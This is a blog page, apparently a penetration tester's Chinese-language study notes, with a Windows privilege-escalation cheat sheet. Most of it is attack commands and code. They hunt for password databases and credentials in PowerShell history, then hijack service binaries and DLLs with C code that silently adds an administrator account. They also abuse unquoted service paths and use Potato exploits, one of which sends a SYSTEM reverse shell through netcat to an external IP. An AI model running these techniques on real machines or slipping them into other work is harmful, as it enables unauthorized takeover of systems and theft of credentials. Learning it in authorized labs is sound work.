<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Windows Privilege Escalation - Running Man</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Running Man"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Running Man"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="手动信息收集常用命令"><meta property="og:type" content="blog"><meta property="og:title" content="Windows Privilege Escalation"><meta property="og:url" content="https://1ue0v.github.io/2024/06/07/Windows-Privilege-Escalation/"><meta property="og:site_name" content="Running Man"><meta property="og:description" content="手动信息收集常用命令"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://1ue0v.github.io/img/og_image.png"><meta property="article:published_time" content="2024-06-07T06:35:46.000Z"><meta property="article:modified_time" content="2024-11-29T09:00:53.303Z"><meta property="article:author" content="1ue0v"><meta property="article:tag" content="Pentest"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://1ue0v.github.io/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://1ue0v.github.io/2024/06/07/Windows-Privilege-Escalation/"},"headline":"Windows Privilege Escalation","image":["https://1ue0v.github.io/img/og_image.png"],"datePublished":"2024-06-07T06:35:46.000Z","dateModified":"2024-11-29T09:00:53.303Z","author":{"@type":"Person","name":"1ue0v"},"publisher":{"@type":"Organization","name":"Running Man","logo":{"@type":"ImageObject","url":"https://1ue0v.github.io/img/logo.svg"}},"description":"手动信息收集常用命令"}</script><link rel="canonical" href="https://1ue0v.github.io/2024/06/07/Windows-Privilege-Escalation/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="Running Man" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2024-06-07T06:35:46.000Z" title="6/7/2024, 2:35:46 PM">2024-06-07</time></span><span class="level-item">Updated&nbsp;<time dateTime="2024-11-29T09:00:53.303Z" title="11/29/2024, 5:00:53 PM">2024-11-29</time></span><span class="level-item">9 minutes read (About 1349 words)</span></div></div><h1 class="title is-3 is-size-4-mobile">Windows Privilege Escalation</h1><div class="content"><h2 id="手动信息收集"><a href="#手动信息收集" class="headerlink" title="手动信息收集"></a>手动信息收集</h2><h3 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h3><span id="more"></span>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"># 查看当前用户属于哪个组</span><br><span class="line">whoami /groups</span><br><span class="line"></span><br><span class="line"># 获取本地用户</span><br><span class="line">Get-LocalUser</span><br><span class="line"></span><br><span class="line"># 获取本地组</span><br><span class="line">Get-LocalGroup</span><br><span class="line"></span><br><span class="line"># 获取指定组内的成员</span><br><span class="line">Get-LocalGroupMember adminteam</span><br><span class="line"></span><br><span class="line"># 获取主机开放的端口连接</span><br><span class="line">netstat -ano</span><br><span class="line"></span><br><span class="line"># 查看已经安装的应用程序</span><br><span class="line">Get-ItemProperty &quot;HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*&quot; | select displayname</span><br><span class="line"></span><br><span class="line"># 查看进程信息</span><br><span class="line">Get-Process</span><br><span class="line"></span><br><span class="line"># 搜索所有的密码数据库文件</span><br><span class="line">Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue</span><br><span class="line"></span><br><span class="line"># 搜索配置文件</span><br><span class="line">Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue</span><br><span class="line">Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue</span><br><span class="line"></span><br><span class="line"># 查看当前用户属于哪个组</span><br><span class="line">net user username</span><br><span class="line"></span><br><span class="line"># 以其他用户权限启动cmd</span><br><span class="line">runas /user:backupadmin cmd</span><br></pre></td></tr></table></figure>

<h3 id="检索历史记录"><a href="#检索历史记录" class="headerlink" title="检索历史记录"></a>检索历史记录</h3><p>主要是Script Block Logging or PowerShell Transcription</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 检查历史命令</span><br><span class="line">Get-History</span><br><span class="line"></span><br><span class="line"># 如果上面的返回空，下面的命令更好，会返回一个文件路径，然后将下面返回的文件路径type出来</span><br><span class="line">(Get-PSReadlineOption).HistorySavePath</span><br><span class="line">如果返回了凭据信息，可以在kali上连接</span><br><span class="line">evil-winrm -i 192.168.50.220 -u daveadmin -p &quot;qwertqwertqwert123\!\!&quot;</span><br></pre></td></tr></table></figure>

<h2 id="自动化信息收集"><a href="#自动化信息收集" class="headerlink" title="自动化信息收集"></a>自动化信息收集</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\winPEAS.exe</span><br></pre></td></tr></table></figure>

<h2 id="利用Windows服务进行提权"><a href="#利用Windows服务进行提权" class="headerlink" title="利用Windows服务进行提权"></a>利用Windows服务进行提权</h2><p>主要包括劫持服务二进制文件、劫持服务 DLL、滥用未加引号的服务路径</p>
<h3 id="服务二进制文件劫持"><a href="#服务二进制文件劫持" class="headerlink" title="服务二进制文件劫持"></a>服务二进制文件劫持</h3><p>每个 Windows 服务都有一个关联的二进制文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 如果下面的命令在winrm或者bind shell中运行失败，可能使用rdp登录可以解决这种问题</span><br><span class="line">Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object &#123;$_.State -like &#x27;Running&#x27;&#125;</span><br><span class="line"></span><br><span class="line"># 获取服务的权限设置</span><br><span class="line">icacls &quot;C:\xampp\apache\bin\httpd.exe&quot;</span><br><span class="line">C:\xampp\apache\bin\httpd .exe BUILTIN\Administrators:(F)</span><br><span class="line">NT AUTHORITY\SYSTEM:(F)</span><br><span class="line">BUILTIN\Users:(RX)</span><br><span class="line">NT AUTHORITY\Authenticated Users:(RX) </span><br><span class="line"># 权限表如下</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>Mask</th>
<th>Permissions</th>
</tr>
</thead>
<tbody><tr>
<td>F</td>
<td>Full access</td>
</tr>
<tr>
<td>M</td>
<td>Modify access</td>
</tr>
<tr>
<td>RX</td>
<td>Read and execute access</td>
</tr>
<tr>
<td>R</td>
<td>Read-only access</td>
</tr>
<tr>
<td>W</td>
<td>Write-only access</td>
</tr>
</tbody></table>
<p>创建adduser.c文件并在kali上交叉编译</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdlib .h&gt;</span><br><span class="line">int main ()</span><br><span class="line">&#123;</span><br><span class="line">int i;</span><br><span class="line">i = system (&quot;net user dave2 password123! /add&quot;);</span><br><span class="line">i = system (&quot;net localgroup administrators dave2 /add&quot;);</span><br><span class="line">return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"># Kali交叉编译</span><br><span class="line">x86_64-w64-mingw32-gcc adduser.c -o adduser.exe</span><br><span class="line"></span><br><span class="line">将adduser.exe放到目标机器上替换mysqld.exe</span><br><span class="line"></span><br><span class="line"># 尝试重启mysql服务，一般会报错，普通用户没有重启系统服务的权限</span><br><span class="line">net stop mysql</span><br><span class="line"># 检查mysql服务的启动类型</span><br><span class="line">Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object &#123;$_.Name -like &#x27;mysql&#x27;&#125;</span><br><span class="line"></span><br><span class="line"># 检查当前用户的权限</span><br><span class="line">whoami /priv</span><br></pre></td></tr></table></figure>

<p>或者使用PowerUp.ps1脚本检查是否存在脆弱的服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">powershell -ep bypass</span><br><span class="line">..\PowerUp.ps1</span><br><span class="line">Get-ModifiableServiceFile</span><br></pre></td></tr></table></figure>

<h3 id="服务dll文件劫持"><a href="#服务dll文件劫持" class="headerlink" title="服务dll文件劫持"></a>服务dll文件劫持</h3><p>Windows检索dll文件的顺序</p>
<table>
<thead>
<tr>
<th>序号</th>
<th>目录</th>
</tr>
</thead>
<tbody><tr>
<td>1.</td>
<td>directory from which the application loaded .</td>
</tr>
<tr>
<td>2.</td>
<td>system directory .</td>
</tr>
<tr>
<td>3.</td>
<td>16-bit system directory .</td>
</tr>
<tr>
<td>4.</td>
<td>Windows directory .</td>
</tr>
<tr>
<td>5.</td>
<td>current directory .</td>
</tr>
<tr>
<td>6.</td>
<td>directories that are listed in the PATH environment variable .</td>
</tr>
</tbody></table>
<p>需要管理权限才能启动Process Monitor并收集程序加载的dll</p>
<p>如果没找到，可能是服务问题，此时尝试重启服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Restart-Service BetaService</span><br></pre></td></tr></table></figure>

<p>如果找到了服务未加载成功或者缺失或者可以替换的dll，则替换为恶意dll</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdlib .h&gt;</span><br><span class="line">#include &lt;windows .h&gt;</span><br><span class="line">BOOL APIENTRY DllMain(</span><br><span class="line">HANDLE hModule,// Handle to DLL module</span><br><span class="line">DWORD ul_reason_for_call,// Reason for calling function</span><br><span class="line">LPVOID lpReserved ) // Reserved</span><br><span class="line">&#123;</span><br><span class="line">	switch ( ul_reason_for_call )</span><br><span class="line">	&#123;</span><br><span class="line">        case DLL_PROCESS_ATTACH: // A process is loading the DLL .</span><br><span class="line">        int i;</span><br><span class="line">        i = system (&quot;net user dave2 password123! /add&quot;);</span><br><span class="line">        i = system (&quot;net localgroup administrators dave2 /add&quot;);</span><br><span class="line">        break;</span><br><span class="line">        case DLL_THREAD_ATTACH: // A process is creating a new thread .</span><br><span class="line">        break;</span><br><span class="line">        case DLL_THREAD_DETACH: // A thread exits normally .</span><br><span class="line">        break;</span><br><span class="line">        case DLL_PROCESS_DETACH: // A process unloads the DLL .</span><br><span class="line">        break;</span><br><span class="line">	&#125;</span><br><span class="line">	return TRUE;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"># 编译</span><br><span class="line">x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll</span><br></pre></td></tr></table></figure>

<p>然后重启服务</p>
<p>检查exe文件中的dll</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxd xxx.exe</span><br><span class="line">strings xxx.exe</span><br></pre></td></tr></table></figure>

<p>如果是使用procmon进行监控的话，部分exe需要手动添加到服务然后启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc.exe create &quot;Scheduler&quot; binpath= &quot;C:\Users\J0ker\Desktop\0626w\scheduler.exe&quot;</span><br></pre></td></tr></table></figure>

<p>使用procmon进行dll分析的话需要添加到服务，在public文件夹下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">sc.exe create &quot;Scheduler&quot; binpath= &quot;C:\Users\Public\scheduler.exe&quot;</span><br><span class="line">sc.exe start scheduler.exe</span><br><span class="line">sc.exe start Scheduler</span><br><span class="line">.\scheduler.exe</span><br><span class="line">powershell</span><br><span class="line">Start-Service Scheduler</span><br><span class="line">.\scheduler.exe</span><br><span class="line">net start .\scheduler.exe</span><br><span class="line">打开procmon</span><br><span class="line">Restart-Service Scheduler</span><br></pre></td></tr></table></figure>

<h3 id="可执行文件路径存在空格但是没有用引号"><a href="#可执行文件路径存在空格但是没有用引号" class="headerlink" title="可执行文件路径存在空格但是没有用引号"></a>可执行文件路径存在空格但是没有用引号</h3><p>文件的路径包含一个或多个空格且未括在引号内</p>
<p>例如C:\Program Files\My Program\My service\service.exe，当Windows启动服务时，由于路径中有空格，它将使用以下顺序尝试启动可执行文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">C:\Program .exe</span><br><span class="line">C:\Program Files\My .exe</span><br><span class="line">C:\Program Files\My Program\My .exe</span><br><span class="line">C:\Program Files\My Program\My service\service .exe</span><br></pre></td></tr></table></figure>

<p>可以将可执行文件命名为Program.exe并将其放置在C:\盘</p>
<p>或者命名为My.exe，然后将其放置到C:\Program Files中</p>
<p>或者My.exe 然后将其放置到 C:\Program Files\My Program\</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wmic service get name,pathname |  findstr /i /v &quot;C:\Windows\\&quot; | findstr /i /v &quot;&quot;&quot;</span><br><span class="line">Get-CimInstance -ClassName win32_service | Select Name,State,PathName</span><br></pre></td></tr></table></figure>

<p>先检查是否有权限启动和停止服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Start-Service GammaService</span><br><span class="line">Stop-Service GammaService</span><br></pre></td></tr></table></figure>

<p>检查权限是否可写（返回W）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icacls &quot;C:\&quot;</span><br></pre></td></tr></table></figure>

<p>以如下为例</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe</span><br></pre></td></tr></table></figure>

<p>将shell命名为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Current.exe</span><br><span class="line">放到C:\Program Files\Enterprise Apps\</span><br></pre></td></tr></table></figure>

<p>有时候启动服务会报错，但是不影响shell执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Start-Service GammaService</span><br></pre></td></tr></table></figure>

<p>有时候PowerUp.ps1可以识别出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">powershell -ep bypass</span><br><span class="line">. .\PowerUp.ps1</span><br><span class="line">Get-UnquotedService</span><br><span class="line">Write-ServiceBinary -Name &#x27;GammaService&#x27; -Path &quot;C:\Program Files\Enterprise Apps\Current.exe&quot;</span><br><span class="line">Restart-Service GammaService</span><br></pre></td></tr></table></figure>

<h2 id="其他错误配置导致的提权"><a href="#其他错误配置导致的提权" class="headerlink" title="其他错误配置导致的提权"></a>其他错误配置导致的提权</h2><h3 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 查看计划任务</span><br><span class="line">schtasks /query /fo LIST /v</span><br><span class="line"></span><br><span class="line"># 检查权限</span><br><span class="line">icacls &quot;xxxx.exe&quot;</span><br></pre></td></tr></table></figure>

<h3 id="Potato"><a href="#Potato" class="headerlink" title="Potato"></a>Potato</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">SeImpersonatePrivilege权限</span><br><span class="line"></span><br><span class="line">#PrintSpoofer</span><br><span class="line">.\psf.exe -i -c cmd</span><br><span class="line"></span><br><span class="line">#god potato</span><br><span class="line">https://github.com/BeichenDream/GodPotato</span><br><span class="line">.\gp.exe -cmd &quot;cmd /c whoami&quot;</span><br><span class="line"># 上传nc到机器上</span><br><span class="line">.\gp.exe -cmd  &quot;.\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.167 4444&quot;</span><br><span class="line"># 然后本地拿到system权限的shell</span><br></pre></td></tr></table></figure>
</div><div class="article-licensing box"><div class="licensing-title"><p>Windows Privilege Escalation</p><p><a href="https://1ue0v.github.io/2024/06/07/Windows-Privilege-Escalation/">https://1ue0v.github.io/2024/06/07/Windows-Privilege-Escalation/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>1ue0v</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2024-06-07</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2024-11-29</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/Pentest/">Pentest</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2024/09/24/%E4%BB%8E%E7%BD%91%E7%AB%99js%E8%8E%B7%E5%8F%96%E6%8E%A5%E5%8F%A3%E7%9A%84%E6%96%B9%E6%B3%95/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">从网站js文件获取接口的方法</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2024/06/05/AD-Lateral-Movement/"><span class="level-item">AD域内横向移动</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="https://cdn.jsdelivr.net/gh/alohe/avatars/png/notion_14.png" alt="1ue0v"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">1ue0v</p><p class="is-size-6 is-block">CowHorse</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>RS Company</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives/"><p class="title">33</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories/"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags/"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/sadqdsadsadqwd" target="_blank" rel="me noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/sadsdqdsdqdsqdsd"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">Links</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://pwya.github.io/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Friend Link</span></span><span class="level-right"><span class="level-item tag">pwya.github.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2024/11/"><span class="level-start"><span class="level-item">November 2024</span></span><span class="level-end"><span class="level-item tag">12</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/10/"><span class="level-start"><span class="level-item">October 2024</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/09/"><span class="level-start"><span class="level-item">September 2024</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/06/"><span class="level-start"><span class="level-item">June 2024</span></span><span class="level-end"><span class="level-item tag">9</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/04/"><span class="level-start"><span class="level-item">April 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/03/"><span class="level-start"><span class="level-item">March 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">Tags</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/Malware/"><span class="tag">Malware</span><span class="tag">11</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Pentest/"><span class="tag">Pentest</span><span class="tag">8</span></a></div><div class="control"><a class="tags has-addons" href="/tags/RealWorld/"><span class="tag">RealWorld</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Tips/"><span class="tag">Tips</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Web/"><span class="tag">Web</span><span class="tag">4</span></a></div></div></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">Subscribe for updates</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">follow.it</h3><form action="" method="post" target="_blank"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><div class="column-right-shadow is-hidden-widescreen is-sticky"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list"><li><a class="level is-mobile" href="#手动信息收集"><span class="level-left"><span class="level-item">1</span><span class="level-item">手动信息收集</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#常用命令"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">常用命令</span></span></a></li><li><a class="level is-mobile" href="#检索历史记录"><span class="level-left"><span class="level-item">1.2</span><span class="level-item">检索历史记录</span></span></a></li></ul></li><li><a class="level is-mobile" href="#自动化信息收集"><span class="level-left"><span class="level-item">2</span><span class="level-item">自动化信息收集</span></span></a></li><li><a class="level is-mobile" href="#利用Windows服务进行提权"><span class="level-left"><span class="level-item">3</span><span class="level-item">利用Windows服务进行提权</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#服务二进制文件劫持"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">服务二进制文件劫持</span></span></a></li><li><a class="level is-mobile" href="#服务dll文件劫持"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">服务dll文件劫持</span></span></a></li><li><a class="level is-mobile" href="#可执行文件路径存在空格但是没有用引号"><span class="level-left"><span class="level-item">3.3</span><span 